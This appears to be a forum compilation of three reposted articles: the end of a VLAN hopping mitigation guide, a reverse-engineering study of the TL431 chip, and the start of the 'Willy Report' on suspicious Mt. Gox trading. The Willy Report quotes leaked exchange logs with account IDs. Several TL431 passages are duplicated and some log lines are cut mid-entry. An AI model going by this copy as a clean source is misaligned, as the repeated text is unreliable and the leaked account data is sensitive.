Switch(config-if)# switchport access vlan 10
Switch(config-if)# description access_port
The second countermeasure is to assign the native VLAN on all switch trunks to an unused VLAN.
Switch(config-if)# switchport trunk native vlan 99
Both of the above mitigation options will prevent the VLAN hopping attack, but be aware that a third option exists. You can alternatively tag the native VLAN over all trunks, disabling all untagged traffic over the interface.
Switch(config-if)# switchport trunk native vlan tag
Takeaways
VLAN hopping is an important concept to understand when securing production data networks (or when preparing for the CCNP exams). Both switch spoofing and double tagging can be prevented with simple trunk and access port configuration parameters. It is also important to know that modern versions of Cisco IOS code drop 802.1Q tagged packets on incoming access ports, helping to limit the potential for a double tagging attack. In the end, just provision ports statically, disable DTP globally, and lock down native VLANs to make your networks more secure.
VLAN hopping is a complicated topic that doesn't have to be. Understanding the attacks and countermeasures will not only help you on exam day, but will help you keep your networks more secure.
Sursa: Understanding VLAN Hopping Attacks | CCNP Guide
15. [h=3]Reverse-engineering the TL431: the most common chip you've never heard of[/h]
A die photo of the interesting but little-known TL431 power supply IC provides an opportunity to explore how analog circuits are implemented in silicon. While the circuit below may look like a maze, the chip is actually relatively simple and can be reverse-engineered with a bit of examination. This article explains how transistors, resistors, and other components are implemented in silicon to form the chip below.
Die photo of the TL431. Original photo by Zeptobars.
The TL431 is a "programmable precision reference"[1] and is commonly used in switching power supplies, where it provides feedback indicating if the output voltage is too high or too low. By using a special circuit called a bandgap, the TL431 provides a stable voltage reference across a wide temperature range. The block diagram of the TL431 below shows that it has a 2.5 volt reference and a comparator[1], but looking at the die shows that internally it is quite different from the block diagram.
TL431 block diagram from the datasheet
The TL431 has a long history; it was introduced in 1978[2] and has been a key part of many devices since then. It helped regulate the Apple II power supply, and is now used in most ATX power supplies[3] as well as the iPhone charger and other chargers. The MagSafe adapter and other laptop adapters use it, as well as minicomputers, LED drivers, audio power supplies, video games and televisions.[4]
The photos below show the TL431 inside six different power supplies. The TL431 comes in many different shapes and sizes; the two most common are shown below.[5] Perhaps one reason the TL431 doesn't get much attention is that it looks like a simple transistor, not an IC.
Six examples of power supplies using the TL431. Top row: cheap 5 volt power supply, cheap phone charger, Apple iPhone charger (also 'GB9' variant in lower left). Bottom row: MagSafe power adapter, KMS USB charger, Dell ATX power supply (with optoisolators in front)
[h=2]How components are implemented in the TL431's silicon[/h]
Since the TL431 is a fairly simple IC, it's possible to understand what's going on with the silicon layout by examining it closely. I'll show how the transistors, resistors, fuses, and capacitors are implemented, followed by a reverse-engineering of the full chip.
[h=3]Implementing different transistor types in the IC[/h]
The chip uses NPN and PNP bipolar junction transistors (in contrast to chips like the 6502 that use MOSFET transistors). If you've studied electronics, you've probably seen a diagram of an NPN transistor like the one below, showing the collector (C), base (B), and emitter (E) of the transistor. The transistor is illustrated as a sandwich of P silicon in between two symmetric layers of N silicon; the N-P-N layers make an NPN transistor. It turns out that on the chip, the transistors look nothing like this. The base isn't even in the middle!
Symbol and structure of an NPN transistor.
The photo below shows one of the transistors in the TL431 as it appears on the chip. The different pink and purple colors are regions of silicon that have been doped differently, forming N and P regions. The whitish-yellow areas are the metal layer of the chip on top of the silicon; these form the wires connecting to the collector, emitter, and base.
Underneath the photo is a cross-section drawing showing approximately how the transistor is constructed.[6] There's a lot more than just the N-P-N sandwich you see in books, but if you look carefully at the vertical cross section below the 'E', you can find the N-P-N that forms the transistor. The emitter (E) wire is connected to N+ silicon. Below that is a P layer connected to the base contact (B). And below that is an N+ layer connected (indirectly) to the collector (C).[7] The transistor is surrounded by a P+ ring that isolates it from neighboring components. Since most of the transistors in the TL431 are NPN transistors with this structure, it's straightforward to pick out the transistors and find the collector, base, and emitter, once you know what to look for.
An NPN transistor from the TL431 die, and its silicon structure.
The NPN output transistor in the TL431 is much larger than the other transistors since it needs to handle the full current load of the device. While most of the transistors are operating on microamps, this transistor supports up to 100 mA. To support this current, it is large (taking up more than 6% of the entire die) and has wide metal connections to the emitter and collector.
The layout of the output transistor is very different from the other NPN transistors. This transistor is built laterally, with the base between the emitter and collector. The metal on the left connects to the 10 emitters (bluish N silicon), each surrounded by pinkish P silicon for the base (middle wire). The collector (right) has one large contact. The emitter and base wires form nested "fingers". Notice how the metal for the collector gets wider from top to bottom to support the higher current at the bottom of the transistor. The image below shows a detail of the transistor, and the die photo shows the entire transistor.
Closeup of the high-current output transistor in the TL431 chip.
The PNP transistors have an entirely different layout from the NPN transistors. They consist of a circular emitter (P), surrounded by a ring-shaped base (N), which is surrounded by the collector (P). This forms a P-N-P sandwich horizontally (laterally), unlike the vertical structure of the NPN transistors.[8] The diagram below shows one of the PNP transistors in the TL431, along with a cross-section showing the silicon structure. Note that although the metal contact for the base is on the edge of the transistor, it is electrically connected through the N and N+ regions to its active ring in between the collector and emitter.
Structure of a PNP transistor in the TL431 chip.
[h=3]How resistors are implemented in silicon[/h]
Resistors are a key component in an analog chip such as the TL431. They are implemented as a long strip of doped silicon. (In this chip, it looks like P silicon is used for the resistors.) Different resistances are obtained by using different lengths of resistive material: the resistance is proportional to the length-to-width ratio. The photo below shows three resistors on the die. The three long horizontal strips are the resistive silicon that forms the resistors. Yellowish-white metal conductors pass over the resistors. Note the square contacts where the metal layer is connected to the resistor. The positions of these contacts control the active length of the resistor and thus the resistance. The resistance of the resistor on the bottom is slightly larger because the contacts are slightly farther apart. The top two resistors are connected in series by the metal on the upper left.
Resistors in the TL431.
Resistors in ICs have very poor tolerance: the resistance can vary 20% from chip to chip due to variations in the manufacturing process. This is obviously a problem for a precision chip like the TL431. For this reason, the TL431 is designed so that the important parameter is the ratio of resistances, especially R1, R2, R3, and R4. As long as the resistances all vary in the same ratio, their exact values don't matter too much. The second way the chip reduces the effect of variation is in the chip layout. The resistors are laid out in parallel bands of the same width to reduce the effect of any asymmetry in the silicon's resistance. The resistors are also placed close together to minimize any variation in silicon properties between different parts of the chip. Finally, the next section shows how the resistances can be adjusted before the chip is packaged, to fine-tune the chip's performance.
[h=3]Silicon fuses to trim the resistors[/h]
One feature of the TL431 that I didn't expect is fuses for trimming the resistances. During manufacture of the chips, these fuses can be blown to adjust the resistances to increase the accuracy of the chip. Some more expensive chips have laser-trimmed resistors, where a laser burns away part of the resistor before the chip is packaged, providing more control than a fuse. The die photo below shows one of the fuse circuits. There is a small resistor (actually two parallel resistors) in parallel with a fuse. Normally, the fuse causes the resistor to be bypassed. During manufacture, the characteristics of the chip can be measured. If more resistance is required, two probes contact the pads and apply a high current. This blows the fuse, adding the small resistance to the circuit. Thus, the resistance in the final circuit can be slightly adjusted to improve the chip's accuracy.
A trimming fuse in the TL431.
[h=3]Capacitors[/h]
The TL431 contains two capacitors internally, and they are implemented in very different ways. The first capacitor (under the TLR431A text) is formed from a reverse-biased diode (the reddish and purple stripes). The junction of a reverse-biased diode has capacitance, which can be used to form a capacitor (details). One limitation of this type of capacitor is that the capacitance varies with voltage, because the junction width changes.
A junction capacitor in the TL431 chip with interdigitated PN junctions. The die id is written in metal on top.
The second capacitor is formed in an entirely different manner, and is more like a traditional capacitor with two plates. There's not much to see: it has a large metal plate with the N+ silicon underneath acting as the second plate. The shape is irregular, to fit around other parts of the circuit. This capacitor takes up about 14% of the die, illustrating that capacitors use space very inefficiently in integrated circuits. The datasheet indicates these capacitors are each 20 pF; I don't know if this is the real value or not.
A capacitor in the TL431 chip.
[h=2]The TL431 chip reverse-engineered[/h]
The TL431 die, labeled.
The diagram above indicates the components on the die of the TL431, labeled to correspond to the schematic below. From the earlier discussion, the structure of each component should be clear. The three pins of the chip are connected to the "ref", "anode", and "cathode" pads. The chip has a single layer of metal (yellowish-white) that connects the components. The schematic shows resistances in terms of an unknown scale factor R;
100 Ω is probably a reasonable value for R, but I don't know the exact value. One big surprise from looking at the die is that the component values are very different from the values in previously-published schematics. These values fundamentally affect how the bandgap voltage reference works.[9]
Internal schematic of the TL431
[h=2]How the chip works[/h]
Externally, the TL431's operation is straightforward. If the voltage on the ref pin input goes above 2.5 volts, the output transistor conducts, causing current flow between the cathode and anode pins. In a power supply, this increase in current flow signals the power supply control chip (indirectly), causing it to reduce the power, which will bring the voltage back to the desired level. Thus, the power supply uses the TL431 to keep the output voltage stable.
I'll give a brief summary of the chip's internal operation here, and write up a detailed explanation later. The most interesting part of the chip is the temperature-compensated bandgap voltage reference.[10] The key to this is seen by looking at the die: transistor Q5 has 8 times the emitter area of Q4, so the two transistors are affected differently by temperature. The outputs of these transistors are combined by R2, R3, and R4 in the right ratio to cancel out the effects of temperature, forming a stable reference.[11][12] The voltages from the temperature-stabilized bandgap are sent into the comparator, which has inputs Q6 and Q1; Q8 and Q9 drive the comparator. Finally, the output of the comparator goes through Q10 to drive the output transistor Q11.
[h=2]Decapping the TL431 the low tech way[/h]
Getting an IC die photo usually involves dissolving the chip in dangerous acids and then photographing the die with an expensive metallurgical microscope. (Zeptobars describes their process here.) I wondered what I'd end up with if I just smashed a TL431 open with Vise-Grip pliers and took a look with a cheap microscope. I broke the die in half in the process, but still got some interesting results. The picture below shows the large copper anode inside the package, which acts as a heat sink. Next to this is (most of) the die, which is normally mounted on the copper anode where the white circle is. Note how much smaller the die is than the package.
The TL431 package, the internal anode, and most of the die.
Using a basic microscope, I obtained the photo below. While the picture doesn't have the same quality as Zeptobars', it shows the structure of the chip better than I expected. This experiment shows that you can do a basic level of chip decapping and die photography without messing around with dangerous acids. From this photo I can see that the cheap TL431s I ordered off eBay are identical to the one Zeptobars decapped. Since the Zeptobars chip didn't match published schematics, I wondered if they had ended up with a strange chip variant, but apparently not.
Piece of the TL431 die, photographed through a microscope.
[h=2]Conclusion[/h]
Is the TL431 really the most popular IC people haven't heard of? There's no way to know for sure, but I think it's a good candidate. Nobody seems to publish data on which ICs are produced in largest quantities. Some sources say the 555 timer is the most popular chip, with a billion produced every year (which seems improbably high to me). The TL431 must be high up the popularity list: you probably have a TL431 within arm's reach right now (in your phone charger, laptop power adapter, PC power supply, or monitor). The difference is that chips such as the 555 and 741 are so well-known that they are almost part of pop culture, with books, T-shirts and even mugs. But unless you've worked on power supplies, chances are you've never heard of the TL431. Thus, the TL431 gets my vote for the most common IC that people are unaware of. If you have other suggestions for ICs that don't get the attention they deserve, leave a comment.
[h=2]Acknowledgments[/h]
The die photos are by Zeptobars (except the photo I took). The schematic and analysis are heavily based on Christophe Basso's work.[12] The analysis benefited from discussion with the Visual 6502 group, in particular B. Engl.
[h=2]Notes and references[/h]
[1] Because the TL431 has an unusual function, there's no standard name for its function. Different datasheets describe it as an "adjustable shunt regulator", a "programmable precision reference", a "programmable shunt voltage reference", and a "programmable zener".
[2] I dug up some history on the origins of the TL431 from Texas Instruments' Voltage Regulator Handbook (1977). The precursor chip, the TL430, was introduced as an adjustable shunt regulator in 1976. The TL431 was created as an improvement to the TL430 with better accuracy and stability, and was called a precision adjustable shunt regulator. The TL431 was announced as a future product in 1977 and launched in 1978. Another future product that TI announced in 1977 was the TL432, which was going to be "Timer/Regulator/Comparator Building Blocks", containing a voltage reference, comparator, and booster transistor in one package (preliminary datasheet). But when the TL432 came out, the "building block" plan had been abandoned. The TL432 ended up being merely a TL431 with the pins in a different order, to help PC board layout (datasheet).
[3] Modern ATX power supplies (example, example) often contain three TL431s. One provides feedback for the standby power supply, another provides feedback for the main power supply, and a third is used as a linear regulator for the 3.3V output.
[4] It's interesting to look at the switching power supplies that don't use the TL431. Earlier switching power supplies typically used a Zener diode as a voltage reference. The earliest Apple II power supplies used a Zener diode as the voltage reference (Astec AA11040), but this was soon replaced by a TL431 in the Astec AA11040-B revision. The Commodore CBM-II model B used a TL430 instead of a TL431, which is an unusual choice. The original IBM PC power supply used a Zener diode for reference (along with many op amps). Later PC power supplies often used the TL494 PWM controller, which contained its own voltage reference and operated on the secondary side. Other ATX power supplies used the SG6105, which included two TL431s internally. Phone chargers usually use the TL431. Inexpensive knockoffs are an exception; they often use a Zener diode instead to save a few cents. Another exception is chargers such as the iPad charger, which use primary-side regulation and don't use any voltage feedback from the output at all. See my article on power supply history for more information.
[5] The TL431 is available in a larger variety of packages than I'd expect. Two of the photos show the TL431 in a transistor-like package with three leads (TO-92). The remaining photos show the surface-mounted SOT23-3 package.
The difference is that chips such as the 555 and 741 are so well-known that they are almost part of pop culture, with books, T-shirts and even mugs. But unless you've worked on power supplies, chances are you've never heard of the TL431. Thus, the TL431 gets my vote for the most common IC that people are unaware of. If you have other suggestions for ICs that don't get the attention they deserve, leave a comment.
[h=2]Acknowledgments[/h]
The die photos are by Zeptobars (except the photo I took). The schematic and analysis are heavily based on Christophe Basso's work.[12] The analysis benefited from discussion with the Visual 6502 group, in particular B. Engl.
[h=2]Notes and references[/h]
[1] Because the TL431 has an unusual function, there's no standard name for its function. Different datasheets describe it as an "adjustable shunt regulator", a "programmable precision reference", a "programmable shunt voltage reference", and a "programmable zener".
[2] I dug up some history on the origins of the TL431 from Texas Instruments' Voltage Regulator Handbook (1977). The precursor chip, the TL430, was introduced as an adjustable shunt regulator in 1976. The TL431 was created as an improvement to the TL430, with better accuracy and stability, and was called a precision adjustable shunt regulator. The TL431 was announced as a future product in 1977 and launched in 1978. Another future product that TI announced in 1977 was the TL432, which was going to be "Timer/Regulator/Comparator Building Blocks", containing a voltage reference, comparator, and booster transistor in one package (preliminary datasheet). But when the TL432 came out, the "building block" plan had been abandoned. The TL432 ended up being merely a TL431 with the pins in a different order, to help PC board layout (datasheet).
[3] Modern ATX power supplies (example, example) often contain three TL431s. One provides feedback for the standby power supply, another provides feedback for the main power supply, and a third is used as a linear regulator for the 3.3V output.
[4] It's interesting to look at the switching power supplies that don't use the TL431. Earlier switching power supplies typically used a Zener diode as a voltage reference. The earliest Apple II power supplies used a Zener diode as the voltage reference (Astec AA11040), but this was soon replaced by a TL431 in the Astec AA11040-B revision. The Commodore CBM-II model B used a TL430 instead of a TL431, which is an unusual choice. The original IBM PC power supply used a Zener diode for reference (along with many op amps). Later PC power supplies often used the TL494 PWM controller, which contained its own voltage reference and operated on the secondary side. Other ATX power supplies used the SG6105, which included two TL431s internally. Phone chargers usually use the TL431. Inexpensive knockoffs are an exception; they often use a Zener diode instead to save a few cents. Another exception is chargers such as the iPad charger, which use primary-side regulation and don't use any voltage feedback from the output at all. See my article on power supply history for more information.
[5] The TL431 is available in a larger variety of packages than I'd expect. Two of the photos show the TL431 in a transistor-like package with three leads (TO-92). The remaining photos show the surface-mounted SOT23-3 package.
The TL431 also comes in 4-pin, 5-pin, 6-pin, or 8-pin surface-mounted packages (SOT-89, SOT23-5, SOT323-6, SO-8 or MSOP-8), as well as a larger package like a power transistor (TO-252) or an 8-pin IC package (DIP-8) (pictures).
[6] For more information on how bipolar transistors are implemented in silicon, there are many sources. Semiconductor Technology gives a good overview of NPN transistor construction. Basic Integrated Circuit Processing is a presentation that describes transistor fabrication in great detail. The Wikipedia diagram is also useful.
[7] You might have wondered why there is a distinction between the collector and emitter of a transistor, when the simple picture of a transistor is totally symmetrical. Both connect to an N layer, so why does it matter? As you can see from the die photo, the collector and emitter are very different in a real transistor. In addition to the very large size difference, the silicon doping is different. The result is that a transistor will have poor gain if the collector and emitter are swapped.
[8] The PNP transistors in the TL431 have a circular structure that gives them a very different appearance from the NPN transistors. The circular structure used for PNP transistors in the TL431 is illustrated in Designing Analog Chips by Hans Camenzind, who was the designer of the 555 timer. If you want to know more about how analog chips work, I strongly recommend Camenzind's book, which explains analog circuits in detail with a minimum of mathematics. Download the free PDF or get the printed version. The structure of a PNP transistor is also explained in Principles of Semiconductor Devices. Analysis and Design of Analog Integrated Circuits provides detailed models of bipolar transistors and how they are fabricated in ICs.
[9] The transistors and resistors in the die I examined have very different values from the values others have published. These values fundamentally affect the operation of the bandgap voltage reference. Specifically, previous schematics show R2 and R3 in a 1:3 ratio, and Q5 with 2 times the emitter area of Q6. Looking at the die photo, R2 and R3 are equal, and Q5 has 8 times the emitter area of Q4. These ratios result in a different ΔVbe. To compensate for this, R1 and R4 are different between previous schematics and the die photo. I will explain this in detail in a later article, but to summarize, Vref = 2*Vbe + (2*R1+R2)/R4 * ΔVbe, which works out to about 2.5 volts. Note that it is the ratio of the resistances that matters, not the values; this helps counteract the poor resistor tolerances in a chip. In the die, Q8 is formed from two transistors in parallel. I would expect Q8 and Q9 to be identical to form a balanced comparator, so I don't understand the motivation behind this. My leading theory is that this adjusts the reference voltage up slightly to hit 2.5V. B. Engl suggests this may help the device operate better at low voltage.
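To see how the expression in note [9] lands near 2.5 volts, here is the arithmetic written out. The 8:1 emitter ratio is read off the die; the Vbe value and the resistor ratio below are my own illustrative estimates (the actual resistor values aren't known), not measurements:

\Delta V_{be} = \frac{kT}{q} \ln 8 \approx 25.9\,\mathrm{mV} \times 2.08 \approx 54\,\mathrm{mV} \qquad (T = 300\,\mathrm{K})

V_{ref} = 2 V_{be} + \frac{2R_1 + R_2}{R_4}\,\Delta V_{be} \approx 2 \times 0.65\,\mathrm{V} + 22 \times 54\,\mathrm{mV} \approx 2.5\,\mathrm{V}

Since ΔVbe is proportional to absolute temperature while Vbe decreases with temperature, weighting the two terms appropriately makes the sum nearly temperature-independent; that is the essence of the bandgap trick.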
[10] I won't go into the details of a bandgap reference here, except to mention that it sounds like some crazy quantum device, but it's really just a couple of transistors. For more information on how a bandgap reference works, see How to make a bandgap voltage reference in one easy lesson by Paul Brokaw, inventor of the Brokaw bandgap reference. A presentation on the bandgap reference is here.
[11] In a sense, the bandgap circuit in the TL431 operates "backwards" compared to a regular bandgap voltage reference. A normal bandgap circuit provides the necessary emitter voltages to produce the desired voltage as output. The TL431's circuit takes the reference voltage as input, and the emitter voltages are used as outputs to the comparator. In other words, contrary to the block diagram, there is not a stable voltage reference inside the TL431 that is compared to the ref input. Instead, the ref input generates two signals to the comparator that match when the input is 2.5 volts.
[12] There are many articles about the TL431, but they tend to be very technical, expecting a background in control theory, Bode plots, etc. "The TL431 in Switch-Mode Power Supplies loops", a classic TL431 paper by Christophe Basso and Petr Kadanka, explains the TL431 from the internals through loop compensation to an actual power supply. It includes a detailed schematic and description of how the TL431 operates internally. Other related articles are at powerelectronics.com. "Designing with the TL431" (Ray Ridley, Switching Power Magazine) is a detailed explanation of how to use the TL431 for power supply feedback, and of the details of loop compensation. "The TL431 in the Control of Switching Power Supplies" is a detailed presentation from ON Semiconductor. The TL431 datasheet includes a schematic of the chip's internals. Strangely, the resistances on this schematic are very different from what can be seen on the die.
Sursa: Ken Shirriff's blog: Reverse-engineering the TL431: the most common chip you've never heard of
  16. The Willy Report: proof of massive fraudulent trading activity at Mt. Gox, and how it has affected the price of Bitcoin Posted on May 25, 2014 by willyreport Somewhere in December 2013, a number of traders including myself began noticing suspicious bot behavior on Mt. Gox. Basically, a random number between 10 and 20 bitcoin would be bought every 5-10 minutes, non-stop, for at least a month on end until the end of January. The bot was dubbed “Willy” at some point, which is the name I’ll continue to use here. Since Willy was buying in such a recognizable pattern, I figured it would be easy to find in the Mt. Gox trading logs that were leaked about two months ago (there’s a torrent of the data here). However, the logs only went as far as November 2013; luckily, I was able to detect the buying pattern in the last few days of November. Below is a compiled log of its trades on the last two days of November (from the file “2013-11_mtgox_japan.csv”): 29-11-2013 0:07 - UID: 817985 Type: buy Currency: USD BTC: 16.61124644 Fiat: 18709.31 29-11-2013 0:12 - UID: 817985 Type: buy Currency: USD BTC: 17.49854918 Fiat: 19402.8 29-11-2013 0:20 - UID: 817985 Type: buy Currency: USD BTC: 12.01301395 Fiat: 13346.46 29-11-2013 0:30 - UID: 817985 Type: buy Currency: USD BTC: 14.04190796 Fiat: 15172.05 ... 30-11-2013 9:51 - UID: 832432 Type: buy Currency: USD BTC: 17.57018627 Fiat: 21330.73 30-11-2013 10:01 - UID: 832432 Type: buy Currency: USD BTC: 19.90458956 Fiat: 24212.63 30-11-2013 10:10 - UID: 832432 Type: buy Currency: USD BTC: 14.011528 Fiat: 16893.82 30-11-2013 10:19 - UID: 832432 Type: buy Currency: USD BTC: 16.18210837 Fiat: 19561.92 30-11-2013 10:29 - UID: 832432 Type: buy Currency: USD BTC: 18.34173105 Fiat: 22136.74 30-11-2013 10:35 - UID: 832432 Type: buy Currency: USD BTC: 18.19262893 Fiat: 21885.52 30-11-2013 10:45 - UID: 832432 Type: buy Currency: USD BTC: 11.24527636 Fiat: 13492.78 30-11-2013 10:52 - UID: 832432 Type: buy Currency: USD BTC: 14.5141487 Fiat: 17416.93 30-11-2013 10:58 - UID: 832432 Type: buy Currency: USD BTC: 15.805611 Fiat: 18978.39 30-11-2013 11:06 - UID: 832432 Type: buy Currency: USD BTC: 14.96578741 Fiat: 18108.31 30-11-2013 11:13 - UID: 832432 Type: buy Currency: USD BTC: 18.49346572 Fiat: 22412.65 30-11-2013 11:18 - UID: 832432 Type: buy Currency: USD BTC: 12.77630467 Fiat: 15500.85 30-11-2013 11:25 - UID: 832432 Type: buy Currency: USD BTC: 13.70319422 Fiat: 16621.72 30-11-2013 11:35 - UID: 832432 Type: buy Currency: USD BTC: 14.95640049 Fiat: 18120.95 30-11-2013 11:41 - UID: 832432 Type: buy Currency: USD BTC: 15.29944656 Fiat: 18544.72 30-11-2013 11:51 - UID: 832432 Type: buy Currency: USD BTC: 14.10583655 Fiat: 17073.18 30-11-2013 11:58 - UID: 832432 Type: buy Currency: USD BTC: 14.50627441 Fiat: 17560.1 30-11-2013 12:03 - UID: 832432 Type: buy Currency: USD BTC: 13.07979536 Fiat: 15865.66 30-11-2013 12:13 - UID: 832432 Type: buy Currency: USD BTC: 11.88053668 Fiat: 14411.04 30-11-2013 12:20 - UID: 832432 Type: buy Currency: USD BTC: 11.46523059 Fiat: 13913.0 30-11-2013 12:30 - UID: 832432 Type: buy Currency: USD BTC: 19.89610521 Fiat: 24187.39 Some notes on how I obtained this data: first, I removed all exact duplicate entries from the log. As noted in an earlier analysis, trades that involved a user ID “THK” – whose likely role was to facilitate cross-currency trades – were erroneously duplicated in the logs. 
Second, since the log contains an entry for each individual user-to-user trade, I aggregated every pair of trades involving the same user that occurred within 2 seconds of each other, assuming these belonged to the same market buy/sell (2 seconds to account for trading engine lag, which God knows was sometimes enormous on Mt. Gox). You may note that these are actually multiple user IDs (denoted with "UID"); Willy was not a single account: its trading activity was spread over many accounts. Perhaps this is why others had been unable to find him in the database; there were plenty of people who knew of its existence (in fact the OP of this thread allegedly coined the name "Willy"). I noticed here that all of these accounts had one thing in common: the User_Country and User_State fields both had "??" as their entry. This was unusual. Normally, these fields contained country/state FIPS codes (for verified users?), nothing (unverified users?), or "!!" (users who failed verification or suspicious users?). So I went back and gathered all of these "??" users, aggregated their trades, and summed the amount of BTC that each of these accounts bought (they never performed a single sell). They seamlessly connected to each other: when one user became inactive, the next became active, usually within a few hours. Their trading activity went back all the way to September 27th. The full record of trades you can see below:
27-9-2013 13:41 - UID: 807884 Type: buy Currency: USD BTC: 37.77728716 Fiat: 5183.15
27-9-2013 13:42 - UID: 807884 Type: buy Currency: USD BTC: 77.11243579 Fiat: 10615.65
27-9-2013 13:50 - UID: 807884 Type: buy Currency: USD BTC: 124.3094863 Fiat: 17103.01
27-9-2013 13:58 - UID: 807884 Type: buy Currency: USD BTC: 66.22492678 Fiat: 9138.56
27-9-2013 14:05 - UID: 807884 Type: buy Currency: USD BTC: 14.4184561 Fiat: 1988.84
... BTC: 89.43131133 Fiat: 16829.5
4-11-2013 7:44 - UID: 689932 Type: buy Currency: USD BTC: 7.32852211 Fiat: 1648.9
4-11-2013 7:56 - UID: 689932 Type: buy Currency: USD BTC: 10.79379575 Fiat: 2428.6
4-11-2013 8:10 - UID: 689932 Type: buy Currency: USD BTC: 2.6025479 Fiat: 585.31
4-11-2013 8:22 - UID: 689932 Type: buy Currency: USD BTC: 26.14091662 Fiat: 5872.67
...
30-11-2013 9:27 - UID: 832432 Type: buy Currency: USD BTC: 18.03343411 Fiat: 21838.91 30-11-2013 9:33 - UID: 832432 Type: buy Currency: USD BTC: 13.21652953 Fiat: 16041.43 30-11-2013 9:44 - UID: 832432 Type: buy Currency: USD BTC: 17.46274022 Fiat: 21268.82 30-11-2013 9:51 - UID: 832432 Type: buy Currency: USD BTC: 17.57018627 Fiat: 21330.73 30-11-2013 10:01 - UID: 832432 Type: buy Currency: USD BTC: 19.90458956 Fiat: 24212.63 30-11-2013 10:10 - UID: 832432 Type: buy Currency: USD BTC: 14.011528 Fiat: 16893.82 30-11-2013 10:19 - UID: 832432 Type: buy Currency: USD BTC: 16.18210837 Fiat: 19561.92 30-11-2013 10:29 - UID: 832432 Type: buy Currency: USD BTC: 18.34173105 Fiat: 22136.74 30-11-2013 10:35 - UID: 832432 Type: buy Currency: USD BTC: 18.19262893 Fiat: 21885.52 30-11-2013 10:45 - UID: 832432 Type: buy Currency: USD BTC: 11.24527636 Fiat: 13492.78 30-11-2013 10:52 - UID: 832432 Type: buy Currency: USD BTC: 14.5141487 Fiat: 17416.93 30-11-2013 10:58 - UID: 832432 Type: buy Currency: USD BTC: 15.805611 Fiat: 18978.39 30-11-2013 11:06 - UID: 832432 Type: buy Currency: USD BTC: 14.96578741 Fiat: 18108.31 30-11-2013 11:13 - UID: 832432 Type: buy Currency: USD BTC: 18.49346572 Fiat: 22412.65 30-11-2013 11:18 - UID: 832432 Type: buy Currency: USD BTC: 12.77630467 Fiat: 15500.85 30-11-2013 11:25 - UID: 832432 Type: buy Currency: USD BTC: 13.70319422 Fiat: 16621.72 30-11-2013 11:35 - UID: 832432 Type: buy Currency: USD BTC: 14.95640049 Fiat: 18120.95 30-11-2013 11:41 - UID: 832432 Type: buy Currency: USD BTC: 15.29944656 Fiat: 18544.72 30-11-2013 11:51 - UID: 832432 Type: buy Currency: USD BTC: 14.10583655 Fiat: 17073.18 30-11-2013 11:58 - UID: 832432 Type: buy Currency: USD BTC: 14.50627441 Fiat: 17560.1 30-11-2013 12:03 - UID: 832432 Type: buy Currency: USD BTC: 13.07979536 Fiat: 15865.66 30-11-2013 12:13 - UID: 832432 Type: buy Currency: USD BTC: 11.88053668 Fiat: 14411.04 30-11-2013 12:20 - UID: 832432 Type: buy Currency: USD BTC: 11.46523059 Fiat: 13913.0 30-11-2013 12:30 - UID: 832432 Type: buy Currency: USD BTC: 19.89610521 Fiat: 24187.39 And a compilation of when each account was active, how much BTC they bought, and how much USD they spent, with some totals at the bottom: User_ID: 807884 User: a6e1c702-e6b2-4585-bdaf-d1f00e6e7db2 Start: 27-9-2013 13:41 End: 1-10-2013 0:30 BTC bought: 17650.499699839987 USD spent: 2500000.0 User_ID: 658152 User: c1ac7aeb-ac34-49cd-8363-c4bcb36a2b9f Start: 10-10-2013 0:49 End: 15-10-2013 1:53 BTC bought: 17348.26542219 USD spent: 2500000.0 User_ID: 659582 User: b337d02a-ccd5-4323-933d-35e59d228825 Start: 16-10-2013 1:45 End: 18-10-2013 11:14 BTC bought: 15695.016063759997 USD spent: 2500000.0 User_ID: 661608 User: 8bb6ff26-6075-42d3-86d5-57479005393f Start: 18-10-2013 11:19 End: 22-10-2013 9:06 BTC bought: 14137.102515370016 USD spent: 2500000.0 User_ID: 665654 User: cd028348-2fab-4d27-918e-7bdb1b5c0f87 Start: 22-10-2013 22:41 End: 24-10-2013 14:24 BTC bought: 11785.470819779992 USD spent: 2500000.0 User_ID: 683148 User: ec41774a-40f3-4137-ad10-485f5a908713 Start: 31-10-2013 14:44 End: 3-11-2013 19:18 BTC bought: 2338.136038199999 USD spent: 500000.0 User_ID: 689932 User: 5b9a963d-5464-4e51-8cc9-5111a720438e Start: 3-11-2013 21:47 End: 5-11-2013 7:48 BTC bought: 4295.211475280002 USD spent: 1000000.0 ... 
User_ID: 825654 User: f9fc16dd-3010-4104-8c71-077596189e38 Start: 29-11-2013 13:45 End: 30-11-2013 4:18 BTC bought: 2090.5948831200003 USD spent: 2500000.0
User_ID: 832432 User: 26d62882-06c0-4e0e-a79d-3ea8592f490b Start: 30-11-2013 7:25 End: 30-11-2013 12:30 BTC bought: 638.5403779799999 USD spent: 770744.48
Total BTC bought: 268132.73433409 Total USD spent: $111,770,744.48
So basically, each time: (1) an account was created, (2) the account spent some very exact amount of USD to market-buy coins ($2,500,000 was most common), (3) a new account was created very shortly after. Repeat. In total, a staggering ~$112 million was spent to buy close to 270,000 BTC - the bulk of which was bought in November. So if you were wondering how Bitcoin suddenly appreciated in value by a factor of 10 within the span of one month, well, this is why. Not Chinese investors, not the Silkroad bust - these events may have contributed, but they certainly were not the main reason. But more on that later. At this point, I noticed that the first Willy account (created on September 27th), unlike all the others, had some crazy high user ID: 807884, even though regular accounts at that point only went up to 650000 or so. So I went looking for other unusually high user IDs within that month, and lo and behold, there was another time-traveller account with an ID of 698630 - and this account, after being active for close to 8 months, became completely inactive just 7 hours before the first Willy account became active! So it is a reasonable assumption that these accounts were controlled by the same entity. Account 698630 actually had a registered country and state: "JP", "40" - the FIPS code for Tokyo, Japan. So I went and compiled all trades for this account. For convenience, I will dub this user "Markus". Its trades are as follows:
14-2-2013 3:37 - UID: 698630 Type: buy Currency: USD BTC: 2500.00000006 Fiat: 6600.01
14-2-2013 3:37 - UID: 698630 Type: buy Currency: USD BTC: 2500.00000003 Fiat: 258373.84
14-2-2013 3:39 - UID: 698630 Type: buy Currency: USD BTC: 500.0 Fiat: 187.76
14-2-2013 3:42 - UID: 698630 Type: buy Currency: USD BTC: 500.00000003 Fiat: 16.06
14-2-2013 3:53 - UID: 698630 Type: buy Currency: USD BTC: 500.0 Fiat: 2279.47
...
27-9-2013 4:16 - UID: 698630 Type: buy Currency: USD BTC: 113.51156404 Fiat: 7339.57
27-9-2013 4:37 - UID: 698630 Type: buy Currency: USD BTC: 23.27049209 Fiat: 708.08
27-9-2013 5:32 - UID: 698630 Type: buy Currency: USD BTC: 104.28667388 Fiat: 5482.4
27-9-2013 6:14 - UID: 698630 Type: buy Currency: EUR BTC: 1.0 Fiat: 100.46
